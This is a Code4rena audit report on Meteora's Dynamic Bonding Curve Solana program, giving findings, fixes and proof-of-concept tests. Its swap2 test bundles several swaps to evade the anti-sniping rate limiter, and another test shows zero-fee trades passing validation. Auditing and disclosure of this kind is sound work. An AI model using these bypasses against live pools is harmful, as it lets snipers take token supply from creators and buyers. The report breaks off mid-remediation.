Meteora - Dynamic Bonding Curve
Findings & Analysis Report
2025-11-04
Table of contents
Overview
About C4
Code4rena (C4) is a competitive audit platform where security researchers, referred to as Wardens, review, audit, and analyze codebases for security vulnerabilities in exchange for bounties provided by sponsoring projects.
During the audit outlined in this document, C4 conducted an analysis of the Meteora - Dynamic Bonding Curve smart contract system. The audit took place from August 22 to September 12, 2025.
Final report assembled by Code4rena.
Summary
The C4 analysis yielded an aggregated total of 2 unique vulnerabilities. Of these vulnerabilities, 0 received a risk rating in the category of HIGH severity and 2 received a risk rating in the category of MEDIUM severity.
Additionally, C4 analysis included 13 reports detailing issues with a risk rating of LOW severity or non-critical.
All of the issues presented here are linked back to their original finding, which may include relevant context from the judge and Meteora team.
Scope
The code under review can be found within the C4 Meteora - Dynamic Bonding Curve repository, and is composed of {{numContracts}} on-chain programs written in the Rust programming language and includes {{solLoc}} lines of Rust code.
Severity Criteria
C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.
High-level considerations for vulnerabilities span the following key areas when conducting assessments:
- Malicious Input Handling
- Escalation of privileges
- Arithmetic
- Gas use
For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.
Medium Risk Findings (2)
[F-50] Swap rate limiter bypass vulnerability via swap2 instruction
Submitted by faculty1, also found by maxzuvex
It is possible to bypass the feeRateLimiter mode, specifically the swap rate limiter (an anti-sniping feature that prevents snipers from bundling multiple swap instructions in one transaction), by using the swap2 instruction handler. The vulnerability arises from the missing swap2 discriminator check in validate_single_swap_instruction().
pub fn validate_single_swap_instruction(/* ... */) -> Result<()> {
    // ...
if instruction.program_id != crate::ID {
// we treat any instruction including that pool address is other swap ix
for i in 0..instruction.accounts.len() {
if instruction.accounts[i].pubkey.eq(pool) {
msg!("Multiple swaps not allowed");
return Err(PoolError::FailToValidateSingleSwapInstruction.into());
}
}
} else if instruction.data[..8].eq(SwapInstruction::DISCRIMINATOR) {
if instruction.accounts[2].pubkey.eq(pool) {
// otherwise, we just need to search swap instruction discriminator,
// so creator can still bundle initializing pool and swap in 1 tx
msg!("Multiple swaps not allowed");
return Err(PoolError::FailToValidateSingleSwapInstruction.into());
}
}
}
The root cause is shown in the code extract above: the function only checks whether the instruction's discriminator matches SwapInstruction::DISCRIMINATOR, which represents the swap instruction alone. Because the condition does not account for the swap2 instruction discriminator, a sniper can use the swap2 instruction to bypass the swap rate limiter restrictions.
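The flaw can be reduced to a standalone sketch. Note that the discriminator byte values below are invented for illustration only; Anchor derives the real ones as the first 8 bytes of sha256("global:&lt;instruction_name&gt;"):

```rust
// Hypothetical 8-byte Anchor discriminators, for illustration only; real
// values are the first 8 bytes of sha256("global:<instruction_name>").
const SWAP_DISCRIMINATOR: [u8; 8] = [0xf8, 0xc6, 0x9e, 0x91, 0xe1, 0x75, 0x87, 0xc8];
const SWAP2_DISCRIMINATOR: [u8; 8] = [0x41, 0x4b, 0x3f, 0x4c, 0xeb, 0x5b, 0x5b, 0x88];

/// Flawed check: only recognizes the original `swap` instruction.
fn is_swap_flawed(ix_data: &[u8]) -> bool {
    ix_data[..8] == SWAP_DISCRIMINATOR
}

/// Fixed check: recognizes either swap entrypoint.
fn is_swap_fixed(ix_data: &[u8]) -> bool {
    ix_data[..8] == SWAP_DISCRIMINATOR || ix_data[..8] == SWAP2_DISCRIMINATOR
}

fn main() {
    // Instruction data for a swap2 call starts with the swap2 discriminator.
    let swap2_ix = SWAP2_DISCRIMINATOR.to_vec();
    // The flawed check lets a swap2 instruction slip past the rate limiter...
    assert!(!is_swap_flawed(&swap2_ix));
    // ...while the fixed check catches it.
    assert!(is_swap_fixed(&swap2_ix));
}
```

Since Anchor gives every instruction handler its own discriminator, a check that matches only `swap` silently ignores instruction data that begins with the `swap2` discriminator.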
Impact
The lack of a swap2 instruction discriminator check enables a sniper to bypass the swap rate limiter restrictions (1 swap instruction per transaction) and bundle as many as 16 swap instructions (per the code comments) in a single transaction. This is critical: partners advertising a sniper-resistant launch will fall short of that promise, while creators expecting a sniper-resistant launch might suffer losses from snipers acquiring a large portion of the token supply immediately after launch.
Proof of Concept
The proof of concept demonstrates the vulnerability by successfully executing a single transaction containing 3 swap instructions via the swap2 instruction, with feeRateLimiter enabled as the baseFeeMode.
The following are the steps required to run the PoC:
- Create a file swap_rate_limiter_bypass_poc.test.ts in the tests directory.
- Add the code provided below into the newly created file.
- In the package.json file, add a new script command: "swap-rate-limiter-bypass-poc": "anchor build -p dynamic_bonding_curve -- --features local && yarn run ts-mocha --runInBand -p ./tsconfig.json -t 1000000 tests/swap_rate_limiter_bypass_poc.test.ts",
- To run the test, execute npm run swap-rate-limiter-bypass-poc in the terminal.

The test succeeds and produces a transaction log proving 3 swap instructions were successfully executed in a single transaction, thereby bypassing the swap rate limiter restriction of only 1 swap instruction per transaction.
swap_rate_limiter_bypass_poc.test.ts
import { BanksClient, ProgramTestContext } from "solana-bankrun";
import {
createConfig,
CreateConfigParams,
createPoolWithSplToken,
SwapParams2,
} from "./instructions";
import { VirtualCurveProgram } from "./utils/types";
import {
Keypair,
PublicKey,
SYSVAR_INSTRUCTIONS_PUBKEY,
Transaction,
TransactionInstruction,
} from "@solana/web3.js";
import {
derivePoolAuthority,
designCurve,
fundSol,
getOrCreateAssociatedTokenAccount,
getTokenAccount,
processTransactionMaybeThrow,
startTest,
U64_MAX,
unwrapSOLInstruction,
wrapSOLInstruction,
} from "./utils";
import { createVirtualCurveProgram } from "./utils";
import { getConfig, getVirtualPool } from "./utils/fetcher";
import { createToken, mintSplTokenTo } from "./utils/token";
import { expect } from "chai";
import { BN } from "bn.js";
import {
getAssociatedTokenAddressSync,
NATIVE_MINT,
TOKEN_2022_PROGRAM_ID,
TOKEN_PROGRAM_ID,
unpackAccount,
} from "@solana/spl-token";
async function swap2(
banksClient: BanksClient,
program: VirtualCurveProgram,
params: SwapParams2
): Promise<{
pool: PublicKey;
computeUnitsConsumed: number;
message: any;
numInstructions: number;
completed: boolean;
}> {
const {
config,
payer,
pool,
inputTokenMint,
outputTokenMint,
amount0: amountIn,
amount1: minimumAmountOut,
referralTokenAccount,
swapMode,
} = params;
const poolAuthority = derivePoolAuthority();
let poolState = await getVirtualPool(banksClient, program, pool);
const configState = await getConfig(banksClient, program, config);
const tokenBaseProgram =
configState.tokenType == 0 ? TOKEN_PROGRAM_ID : TOKEN_2022_PROGRAM_ID;
const isInputBaseMint = inputTokenMint.equals(poolState.baseMint);
const quoteMint = isInputBaseMint ? outputTokenMint : inputTokenMint;
const [inputTokenProgram, outputTokenProgram] = isInputBaseMint
? [tokenBaseProgram, TOKEN_PROGRAM_ID]
: [TOKEN_PROGRAM_ID, tokenBaseProgram];
const preInstructions: TransactionInstruction[] = [];
const postInstructions: TransactionInstruction[] = [];
const preUserQuoteTokenBalance = 0;
const preBaseVaultBalance = (
await getTokenAccount(banksClient, poolState.baseVault)
).amount;
const [
{ ata: inputTokenAccount, ix: createInputTokenXIx },
{ ata: outputTokenAccount, ix: createOutputTokenYIx },
] = await Promise.all([
getOrCreateAssociatedTokenAccount(
banksClient,
payer,
inputTokenMint,
payer.publicKey,
inputTokenProgram
),
getOrCreateAssociatedTokenAccount(
banksClient,
payer,
outputTokenMint,
payer.publicKey,
outputTokenProgram
),
]);
createInputTokenXIx && preInstructions.push(createInputTokenXIx);
createOutputTokenYIx && preInstructions.push(createOutputTokenYIx);
if (inputTokenMint.equals(NATIVE_MINT) && !amountIn.isZero()) {
const wrapSOLIx = wrapSOLInstruction(
payer.publicKey,
inputTokenAccount,
BigInt(amountIn.toString())
);
preInstructions.push(...wrapSOLIx);
}
if (outputTokenMint.equals(NATIVE_MINT)) {
const unwrapSOLIx = unwrapSOLInstruction(payer.publicKey);
unwrapSOLIx && postInstructions.push(unwrapSOLIx);
}
const swapIx1 = await program.methods
.swap2({
amount0: amountIn,
amount1: minimumAmountOut,
swapMode,
})
.accountsPartial({
poolAuthority,
config,
pool,
inputTokenAccount,
outputTokenAccount,
baseVault: poolState.baseVault,
quoteVault: poolState.quoteVault,
baseMint: poolState.baseMint,
quoteMint,
payer: payer.publicKey,
tokenBaseProgram,
tokenQuoteProgram: TOKEN_PROGRAM_ID,
referralTokenAccount,
})
.remainingAccounts([
{
pubkey: SYSVAR_INSTRUCTIONS_PUBKEY,
isSigner: false,
isWritable: false,
},
])
.instruction();
const swapIx2 = await program.methods
.swap2({
amount0: amountIn,
amount1: minimumAmountOut,
swapMode,
})
.accountsPartial({
poolAuthority,
config,
pool,
inputTokenAccount,
outputTokenAccount,
baseVault: poolState.baseVault,
quoteVault: poolState.quoteVault,
baseMint: poolState.baseMint,
quoteMint,
payer: payer.publicKey,
tokenBaseProgram,
tokenQuoteProgram: TOKEN_PROGRAM_ID,
referralTokenAccount,
})
.remainingAccounts([
{
pubkey: SYSVAR_INSTRUCTIONS_PUBKEY,
isSigner: false,
isWritable: false,
},
])
.instruction();
const swapIx3 = await program.methods
.swap2({
amount0: amountIn,
amount1: minimumAmountOut,
swapMode,
})
.accountsPartial({
poolAuthority,
config,
pool,
inputTokenAccount,
outputTokenAccount,
baseVault: poolState.baseVault,
quoteVault: poolState.quoteVault,
baseMint: poolState.baseMint,
quoteMint,
payer: payer.publicKey,
tokenBaseProgram,
tokenQuoteProgram: TOKEN_PROGRAM_ID,
referralTokenAccount,
})
.remainingAccounts([
{
pubkey: SYSVAR_INSTRUCTIONS_PUBKEY,
isSigner: false,
isWritable: false,
},
])
.instruction();
// @audit creates a transaction with three swap instructions
let ixs = [
...preInstructions,
swapIx1,
swapIx2,
swapIx3,
...postInstructions,
];
let transaction = new Transaction().add(...ixs);
transaction.recentBlockhash = (await banksClient.getLatestBlockhash())[0];
transaction.sign(payer);
let simu = await banksClient.simulateTransaction(transaction);
console.log("simulation logMessages: ", simu.meta.logMessages);
const consumedCUSwap = Number(simu.meta.computeUnitsConsumed);
await processTransactionMaybeThrow(banksClient, transaction);
poolState = await getVirtualPool(banksClient, program, pool);
const configs = await getConfig(banksClient, program, config);
return {
pool,
computeUnitsConsumed: consumedCUSwap,
message: simu.meta.logMessages,
numInstructions: transaction.instructions.length,
completed:
Number(poolState.quoteReserve) >= Number(configs.migrationQuoteThreshold),
};
}
describe("Swap V2", () => {
let context: ProgramTestContext;
let admin: Keypair;
let operator: Keypair;
let partner: Keypair;
let user: Keypair;
let poolCreator: Keypair;
let program: VirtualCurveProgram;
before(async () => {
context = await startTest();
admin = context.payer;
operator = Keypair.generate();
partner = Keypair.generate();
user = Keypair.generate();
poolCreator = Keypair.generate();
const receivers = [
operator.publicKey,
partner.publicKey,
user.publicKey,
poolCreator.publicKey,
];
await fundSol(context.banksClient, admin, receivers);
program = createVirtualCurveProgram();
});
it("Bypasses swap rate limiter", async () => {
let totalTokenSupply = 1_000_000_000; // 1 billion
let percentageSupplyOnMigration = 10; // 10%;
let migrationQuoteThreshold = 300; // 300 sol
let tokenBaseDecimal = 6;
let tokenQuoteDecimal = 9;
let migrationOption = 0; // damm v1
let lockedVesting = {
amountPerPeriod: new BN(0),
cliffDurationFromMigrationTime: new BN(0),
frequency: new BN(0),
numberOfPeriod: new BN(0),
cliffUnlockAmount: new BN(0),
};
let collectFeeMode = 0;
let quoteMint = await createToken(
context.banksClient,
admin,
admin.publicKey,
tokenQuoteDecimal
);
const feeIncrementBps = 100;
const maxLimiterDuration = 86400;
const referenceAmount = 1_000_000;
let instructionParams = designCurve(
totalTokenSupply,
percentageSupplyOnMigration,
migrationQuoteThreshold,
migrationOption,
tokenBaseDecimal,
tokenQuoteDecimal,
0,
collectFeeMode,
lockedVesting,
{
baseFeeOption: {
cliffFeeNumerator: new BN(2_500_000),
firstFactor: feeIncrementBps,
secondFactor: new BN(maxLimiterDuration),
thirdFactor: new BN(referenceAmount),
baseFeeMode: 2, // Rate limiter
},
}
);
const params: CreateConfigParams = {
payer: partner,
leftoverReceiver: partner.publicKey,
feeClaimer: partner.publicKey,
quoteMint,
instructionParams,
};
let config = await createConfig(context.banksClient, program, params);
let swapAmount = instructionParams.migrationQuoteThreshold
.mul(new BN(10))
.div(new BN(100));
await mintSplTokenTo(
context.banksClient,
user,
quoteMint,
admin,
user.publicKey,
swapAmount.toNumber() * 3 // To accommodate the 3 swap ixs
);
// create pool
let virtualPool = await createPoolWithSplToken(
context.banksClient,
program,
{
poolCreator,
payer: operator,
quoteMint,
config,
instructionParams: {
name: "test token spl",
symbol: "TEST",
uri: "abc.com",
},
}
);
let virtualPoolState = await getVirtualPool(
context.banksClient,
program,
virtualPool
);
// swap
const preVaultBalance =
(await getTokenAccount(context.banksClient, virtualPoolState.quoteVault))
.amount ?? 0;
const swapParams: SwapParams2 = {
config,
payer: user,
pool: virtualPool,
inputTokenMint: quoteMint,
outputTokenMint: virtualPoolState.baseMint,
amount0: swapAmount,
amount1: new BN(0),
referralTokenAccount: null,
swapMode: 0, //exact in
};
let swapResult = await swap2(context.banksClient, program, swapParams);
console.log("Swap tx program logs: ", swapResult.message);
});
});
Recommended Mitigation Steps
To fix this vulnerability, add a check for the swap2 instruction discriminator alongside the existing swap discriminator check.
Recommended fix:
use crate::instruction::{Swap as SwapInstruction, Swap2};
pub fn validate_single_swap_instruction<'c, 'info>(
pool: &Pubkey,
remaining_accounts: &'c [AccountInfo<'info>],
) -> Result<()> {
let instruction_sysvar_account_info = remaining_accounts
.get(0)
.ok_or_else(|| PoolError::FailToValidateSingleSwapInstruction)?;
// get current index of instruction
let current_index =
sysvar::instructions::load_current_index_checked(instruction_sysvar_account_info)?;
let current_instruction = sysvar::instructions::load_instruction_at_checked(
current_index.into(),
instruction_sysvar_account_info,
)?;
if current_instruction.program_id != crate::ID {
// check if current instruction is CPI
// disable any stack height greater than 2
if get_stack_height() > 2 {
return Err(PoolError::FailToValidateSingleSwapInstruction.into());
}
// check for any sibling instruction
let mut sibling_index = 0;
while let Some(sibling_instruction) = get_processed_sibling_instruction(sibling_index) {
if sibling_instruction.program_id == crate::ID
&& sibling_instruction.data[..8].eq(SwapInstruction::DISCRIMINATOR)
{
if sibling_instruction.accounts[2].pubkey.eq(pool) {
return Err(PoolError::FailToValidateSingleSwapInstruction.into());
}
}
sibling_index = sibling_index.safe_add(1)?;
}
}
if current_index == 0 {
// skip for first instruction
return Ok(());
}
for i in 0..current_index {
let instruction = sysvar::instructions::load_instruction_at_checked(
i.into(),
instruction_sysvar_account_info,
)?;
if instruction.program_id != crate::ID {
// we treat any instruction including that pool address is other swap ix
for i in 0..instruction.accounts.len() {
if instruction.accounts[i].pubkey.eq(pool) {
msg!("Multiple swaps not allowed");
return Err(PoolError::FailToValidateSingleSwapInstruction.into());
}
}
}
// @audit Fix: Adds Swap2::DISCRIMINATOR check to also restrict swap2 instruction
else if instruction.data[..8].eq(SwapInstruction::DISCRIMINATOR)
|| instruction.data[..8].eq(Swap2::DISCRIMINATOR)
{
if instruction.accounts[2].pubkey.eq(pool) {
// otherwise, we just need to search swap instruction discriminator,
// so creator can still bundle initializing pool and swap in 1 tx
msg!("Multiple swaps not allowed");
return Err(PoolError::FailToValidateSingleSwapInstruction.into());
}
}
}
Ok(())
}
[F-118] Zero-fee trades are possible under certain conditions
Submitted by Matte, also found by Sid_Sisodia
Description
FeeRateLimiter contains a vulnerability that allows zero-fee trades under specific conditions, violating the protocol’s documented requirement of a minimum 0.01% base fee. According to the DBC Documentation’s Trading Fees Calculation section, the “Fixed Base Fee can range from 0.01% to 99%”, and the “Rate Limiter is a fee slope mechanism that starts at a fixed base fee and increases the fee depending on the buy amount. The fee after the rate limiter is finished will be the fixed base fee of the pool.” This explicitly states that even rate-limiter pools must maintain a valid, non-zero base fee within the specified range.
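For context, here is a rough standalone model of a fee slope of the documented shape. This is not the protocol's exact formula; the linear growth per reference-amount chunk is an assumption made purely for this sketch:

```rust
// Rough illustrative model of a rate-limiter fee slope. NOT the protocol's
// exact formula: linear growth per `reference_amount` chunk is an assumption.
fn rate_limited_fee_bps(
    base_fee_bps: u64,
    fee_increment_bps: u64,
    reference_amount: u64,
    buy_amount: u64,
) -> u64 {
    // Buys at or below the reference amount pay only the base fee.
    if reference_amount == 0 || buy_amount <= reference_amount {
        return base_fee_bps;
    }
    // Each additional reference-sized chunk adds one fee increment.
    let extra_chunks = (buy_amount - reference_amount) / reference_amount;
    base_fee_bps + fee_increment_bps * (extra_chunks + 1)
}

fn main() {
    // Small buy: base fee only.
    assert_eq!(rate_limited_fee_bps(100, 50, 1_000, 500), 100);
    // Double-sized buy: the fee has climbed the slope.
    assert_eq!(rate_limited_fee_bps(100, 50, 1_000, 2_000), 200);
}
```

The key property is that the fee floor is the fixed base fee: the slope only ever adds to it, which is why a zero base fee breaks the documented 0.01% minimum.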
Root Cause: The vulnerability stems from a validation bypass in the validate() method at lines 294-296, which contains an early return for zero rate limiters that skips ALL validation checks:
if self.is_zero_rate_limiter() {
return Ok(()); // VULNERABILITY: Bypasses minimum fee validation
}
The flaw is that is_zero_rate_limiter() only checks three parameters (reference_amount, max_limiter_duration, fee_increment_bps) but completely ignores cliff_fee_numerator:
fn is_zero_rate_limiter(&self) -> bool {
self.reference_amount == 0 &&
self.max_limiter_duration == 0 &&
self.fee_increment_bps == 0
// Does NOT check cliff_fee_numerator!
}
This allows a configuration with cliff_fee_numerator = 0 to pass validation despite violating the minimum fee requirement (MIN_FEE_NUMERATOR = 100_000 or 0.01%).
Subsequently, when is_rate_limiter_applied() returns false (which occurs for Base→Quote trades or when the rate limiter duration has expired), the fee calculation methods fall back to returning cliff_fee_numerator directly:
if self.is_rate_limiter_applied(...) {
// Dynamic fee logic
} else {
Ok(self.cliff_fee_numerator) // Returns 0 for misconfigured pools
}
For zero rate limiters where cliff_fee_numerator is zero, this results in completely free trades with zero effective fees, despite the protocol’s expectation of a minimum fee defined by MIN_FEE_NUMERATOR.
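The validation gap and its consequence can be modeled in a self-contained sketch. The struct, method names, and the MIN_FEE_NUMERATOR value follow the report; the internals are simplified and the error string is a placeholder:

```rust
// Simplified model of the finding: field and method names follow the report;
// MIN_FEE_NUMERATOR = 100_000 (0.01%) is the value cited in the finding.
const MIN_FEE_NUMERATOR: u64 = 100_000;

struct FeeRateLimiter {
    cliff_fee_numerator: u64,
    reference_amount: u64,
    max_limiter_duration: u64,
    fee_increment_bps: u16,
}

impl FeeRateLimiter {
    fn is_zero_rate_limiter(&self) -> bool {
        self.reference_amount == 0
            && self.max_limiter_duration == 0
            && self.fee_increment_bps == 0
        // Note: cliff_fee_numerator is never inspected here.
    }

    /// Flawed validation: the zero-rate-limiter early return skips the fee floor.
    fn validate_flawed(&self) -> Result<(), &'static str> {
        if self.is_zero_rate_limiter() {
            return Ok(());
        }
        // ...remaining checks elided for the sketch...
        Ok(())
    }

    /// Patched validation: enforce the floor even for zero rate limiters.
    fn validate_fixed(&self) -> Result<(), &'static str> {
        if self.is_zero_rate_limiter() {
            if self.cliff_fee_numerator < MIN_FEE_NUMERATOR {
                return Err("InvalidFeeRateLimiter");
            }
            return Ok(());
        }
        Ok(())
    }

    /// Fallback path when the limiter is not applied: fee is the cliff value.
    fn base_fee_numerator(&self) -> u64 {
        self.cliff_fee_numerator
    }
}

fn main() {
    let rl = FeeRateLimiter {
        cliff_fee_numerator: 0,
        reference_amount: 0,
        max_limiter_duration: 0,
        fee_increment_bps: 0,
    };
    assert!(rl.validate_flawed().is_ok()); // misconfiguration accepted
    assert_eq!(rl.base_fee_numerator(), 0); // trades become fee-free
    assert!(rl.validate_fixed().is_err()); // patched validation rejects it
}
```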
Recommendation
if self.is_zero_rate_limiter() {
+ require!(
+ self.cliff_fee_numerator >= MIN_FEE_NUMERATOR,
+ PoolError::InvalidFeeRateLimiter
+ );
return Ok(());
}
Proof of Concept
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_zero_fee_rate_limiter_allows_free_trades() {
// Create a zero rate limiter with zero cliff fee (misconfigured)
let rl = FeeRateLimiter {
reference_amount: 0,
max_limiter_duration: 0,
fee_increment_bps: 0,
cliff_fee_numerator: 0, // Zero fee - violates MIN_FEE_NUMERATOR requirement
};
// Validate passes despite zero fee configuration
assert!(rl.validate(
CollectFeeMode::QuoteToken as u8,
ActivationType::Slot
).is_ok(), "Zero rate limiter incorrectly passes validation!");
// When rate limiter is not applied (BaseToQuote or expired),
// fee resolves to cliff_fee_numerator which is zero
let fee = rl.get_base_fee_numerator_from_included_fee_amount(
1000, // current_point
100, // activation_point
TradeDirection::BaseToQuote,
1_000_000 // 1M tokens trade amount
).unwrap();
assert_eq!(fee, 0, "Free trades enabled - zero fee applied!");
// This violates protocol requirement: "Fixed Base Fee can range from 0.01% to 99%"
// Expected: fee >= MIN_FEE_NUMERATOR (1 bps = 0.01%)
// Actual: fee = 0
}
}
Low Risk and Non-Critical Issues
For this audit, 13 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by Almanax received the top score from the judge.
The following wardens also submitted reports: 0x1h3r, 0xAura, 0xozovehe, abh01, faculty1, Fulum, ghufran, Nnbugs22, rare_one, Sid_Sisodia, sjweb3, and won.
QA Report — Meteora Dynamic Bonding Curve
- Commit: 30dd2a1fc5c90949e2038f61c19dc03fee513d98
- Scope: programs/dynamic-bonding-curve/**
- Warden: almanax-1
L-01: Admin bypass risk when local feature is enabled
Location(s): programs/dynamic-bonding-curve/src/instructions/admin/auth.rs
Impact (why this matters): If the local feature is accidentally shipped, any caller will pass admin checks, compromising admin-only functions.
Description (root cause): assert_eq_admin returns true under #[cfg(feature = "local")].
#[cfg(feature = "local")]
pub fn assert_eq_admin(_admin: Pubkey) -> bool {
true
}
Remediation: Replace with a dev-only panic or guard via debug_assertions; ensure CI forbids building releases with --features local.
// Minimal Patch
#[cfg(feature = "local")]
pub fn assert_eq_admin(_admin: Pubkey) -> bool {
- true
+ // Only for local testing; never bypass in runtime
+ panic!("admin bypass is disabled in local builds");
}
# Example CI guard (GitHub Actions)
- run: |
    if [[ "$GITHUB_REF" == refs/tags/* ]] && grep -R "features.*local" Cargo.toml; then
      echo "Local feature must not be enabled in release" && exit 1
    fi
L-02: Missing lifecycle check (is_migrated == 0) before metadata init
Location(s): programs/dynamic-bonding-curve/src/instructions/migration/dynamic_amm_v2/migration_damm_v2_create_metadata.rs
Impact (why this matters): Prevents initializing migration metadata after a pool has already migrated, tightening the state machine and avoiding inconsistencies.
Description (root cause): Handler does not verify migration status before load_init().
// Evidence
pub fn handle_migration_damm_v2_create_metadata(
ctx: Context<MigrationDammV2CreateMetadataCtx>,
) -> Result<()> {
let config = ctx.accounts.config.load()?;
// Missing: check virtual_pool.is_migrated == 0
let mut migration_metadata = ctx.accounts.migration_metadata.load_init()?;
migration_metadata.virtual_pool = ctx.accounts.virtual_pool.key();
migration_metadata.partner = config.fee_claimer;
Ok(())
}
Remediation: Insert migration gate before initializing metadata (use an existing error like NotPermitToDoThisAction, or introduce a dedicated AlreadyMigrated).
pub fn handle_migration_damm_v2_create_metadata(
ctx: Context<MigrationDammV2CreateMetadataCtx>,
) -> Result<()> {
let config = ctx.accounts.config.load()?;
let migration_option = MigrationOption::try_from(config.migration_option)
.map_err(|_| PoolError::InvalidMigrationOption)?;
require!(migration_option == MigrationOption::DammV2, PoolError::InvalidMigrationOption);
+ let vp = ctx.accounts.virtual_pool.load()?;
+ require!(vp.is_migrated == 0, PoolError::NotPermitToDoThisAction);
let mut migration_metadata = ctx.accounts.migration_metadata.load_init()?;
migration_metadata.virtual_pool = ctx.accounts.virtual_pool.key();
migration_metadata.partner = config.fee_claimer;
Ok(())
}
L-03: Duplicate error message text (Invalid activation type)
Location(s): programs/dynamic-bonding-curve/src/error.rs
Impact (why this matters): Confusing diagnostics during troubleshooting.
Evidence:
// 29:31:programs/dynamic-bonding-curve/src/error.rs
#[msg("Invalid activation type")]
InvalidActivationType,
// 56:58:programs/dynamic-bonding-curve/src/error.rs
#[msg("Invalid activation type")]
InvalidTokenDecimals,
Remediation: Update the second message to Invalid token decimals.
L-04: Magic numbers in variable-fee scaling without named constants/docs
Location(s): programs/dynamic-bonding-curve/src/state/config.rs
Impact (why this matters): Reduces auditability and risks subtle mistakes.
Evidence:
// 314:320:programs/dynamic-bonding-curve/src/state/config.rs
let v_fee = square_vfa_bin.safe_mul(self.variable_fee_control.into())?;
// 3. Scaling down the result to fit within u64 range (dividing by 1e11 and rounding up)
let scaled_v_fee = v_fee.safe_add(99_999_999_999)?.safe_div(100_000_000_000)?;
Remediation: Extract ROUNDING_OFFSET and SCALE_DENOMINATOR as constants with doc comments referencing the derivation; add unit tests around boundary values.
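The suggested constants could look like the following sketch; the names are illustrative, and adding `SCALE_DENOMINATOR - 1` before dividing is the standard integer ceiling-division idiom the inline comment alludes to:

```rust
// Named constants for the magic numbers in the variable-fee scaling
// (values taken from the code excerpt above; names are illustrative).
const SCALE_DENOMINATOR: u128 = 100_000_000_000; // 1e11
const ROUNDING_OFFSET: u128 = SCALE_DENOMINATOR - 1; // 99_999_999_999

/// Ceiling division: ceil(v_fee / 1e11) without floating point,
/// returning None on overflow instead of wrapping.
fn scale_v_fee(v_fee: u128) -> Option<u128> {
    v_fee.checked_add(ROUNDING_OFFSET)?.checked_div(SCALE_DENOMINATOR)
}

fn main() {
    assert_eq!(scale_v_fee(0), Some(0)); // exact zero stays zero
    assert_eq!(scale_v_fee(1), Some(1)); // any remainder rounds up
    assert_eq!(scale_v_fee(100_000_000_000), Some(1)); // exact multiple
    assert_eq!(scale_v_fee(100_000_000_001), Some(2)); // just over rounds up
}
```

Boundary-value tests like these are cheap to keep alongside the constants and make the rounding intent explicit.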
L-05: Inconsistent error handling (unwrap()/expect()) in on-chain code
Location(s): programs/dynamic-bonding-curve/src/state/virtual_pool.rs (and others)
Impact (why this matters): Panics abort transactions and complicate error semantics.
Evidence:
// 345:349:programs/dynamic-bonding-curve/src/state/virtual_pool.rs
total_amount_in = total_amount_in.safe_add(in_amount)?;
current_sqrt_price = next_sqrt_price;
amount_left = amount_left.safe_sub(max_amount_out.try_into().unwrap())?;
Similar unwrap() usage appears in swap helper paths.
Remediation: Remove unwrap()/expect() from program code paths; return typed errors instead. Keep unwrap() only in off-chain tests.
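A minimal sketch of the suggested change, with a placeholder error type (`MathOverflow` is illustrative, not an error from the codebase):

```rust
// Sketch: replace a panicking narrowing conversion with a typed error.
// `PoolError::MathOverflow` is a placeholder name for this example.
#[derive(Debug, PartialEq)]
enum PoolError {
    MathOverflow,
}

/// Panicking version: aborts the whole transaction on overflow.
fn narrow_panicking(max_amount_out: u128) -> u64 {
    max_amount_out.try_into().unwrap()
}

/// Typed version: surfaces a recoverable error the caller can map to a code.
fn narrow_checked(max_amount_out: u128) -> Result<u64, PoolError> {
    max_amount_out.try_into().map_err(|_| PoolError::MathOverflow)
}

fn main() {
    assert_eq!(narrow_checked(42), Ok(42));
    assert_eq!(narrow_checked(u128::MAX), Err(PoolError::MathOverflow));
    // narrow_panicking(u128::MAX) would panic and abort the instruction.
    let _ = narrow_panicking(42);
}
```

The typed version composes with the `?` operator already used on the surrounding `safe_add`/`safe_sub` calls.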
L-06: Token2022 extension allowlist is strict—document and test
Location(s): programs/dynamic-bonding-curve/src/utils/token.rs
Impact (why this matters): Current policy denies any non-allowlisted extensions; that’s safer by default, but should be documented to avoid integration surprises.
Evidence: Only MetadataPointer and TokenMetadata are permitted; others return Ok(false).
Remediation: Document the allowlist in README and add tests that ensure rejection for other extensions remains enforced.
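The deny-by-default allowlist described above follows a simple pattern, sketched here with a local stand-in enum (the real code matches on spl-token-2022's `ExtensionType`; only the two metadata variants below are relevant to the finding):

```rust
// Local stand-in for spl-token-2022's ExtensionType, for illustration only.
#[derive(Debug, Clone, Copy, PartialEq)]
enum ExtensionType {
    MetadataPointer,
    TokenMetadata,
    TransferFeeConfig,
    PermanentDelegate,
}

/// Deny-by-default: only the two metadata extensions are accepted;
/// everything else is rejected.
fn is_extension_allowed(ext: ExtensionType) -> bool {
    matches!(
        ext,
        ExtensionType::MetadataPointer | ExtensionType::TokenMetadata
    )
}

fn main() {
    assert!(is_extension_allowed(ExtensionType::MetadataPointer));
    assert!(is_extension_allowed(ExtensionType::TokenMetadata));
    assert!(!is_extension_allowed(ExtensionType::TransferFeeConfig));
    assert!(!is_extension_allowed(ExtensionType::PermanentDelegate));
}
```

Tests asserting the rejection cases keep the allowlist from silently widening when new extension variants appear.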
L-07: Missing signer check for creator/partner in Meteora DAMM LP lock/claim
Location(s):
- programs/dynamic-bonding-curve/src/instructions/migration/meteora_damm/meteora_damm_lock_lp_token.rs
- programs/dynamic-bonding-curve/src/instructions/migration/meteora_damm/meteora_damm_claim_lp_token.rs

Impact (why this matters): Any payer can trigger creator/partner lock/claim flows without an owner signature. While assets still go to the rightful owner, unauthorized state flips (lock/claim flags) can be griefing vectors and may affect downstream expectations.

Description (root cause): The owner account is an UncheckedAccount and is not required to be a signer. For claim, a generic sender: Signer is accepted but is not required to equal owner.

Evidence:

// meteora_damm_lock_lp_token.rs
/// CHECK: owner
pub owner: UncheckedAccount<'info>,

// In handler: only equality checks, no signature binding
let is_partner = ctx.accounts.owner.key() == migration_metadata.partner;
let is_creator = ctx.accounts.owner.key() == virtual_pool.creator;

// meteora_damm_claim_lp_token.rs
/// CHECK: owner of lp token, must be creator or partner
pub owner: UncheckedAccount<'info>,
/// CHECK: signer
pub sender: Signer<'info>,
// No require!(sender == owner)
Remediation: Require an owner signature or bind sender to owner.
// meteora_damm_lock_lp_token.rs
- /// CHECK: owner
- pub owner: UncheckedAccount<'info>,
+ pub owner: Signer<'info>,
// meteora_damm_claim_lp_token.rs
pub owner: UncheckedAccount<'info>,
pub sender: Signer<'info>,
+ // ensure the signer is the declared owner
+ #[inline]
